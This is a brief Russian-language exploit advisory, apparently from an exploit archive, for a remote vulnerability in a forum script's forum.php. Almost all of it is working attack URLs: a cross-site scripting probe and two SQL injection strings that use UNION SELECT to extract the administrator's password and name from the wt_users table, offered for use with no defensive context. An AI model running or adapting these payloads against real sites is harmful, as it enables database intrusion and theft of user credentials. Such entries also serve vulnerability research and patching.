Тип уязвимости: удаленный
Описание:
Уязвимость находится в файле forum.php
Эксплоит:
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
XSS:
http://xxx.com/forum.php?forum='>
SQL:
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*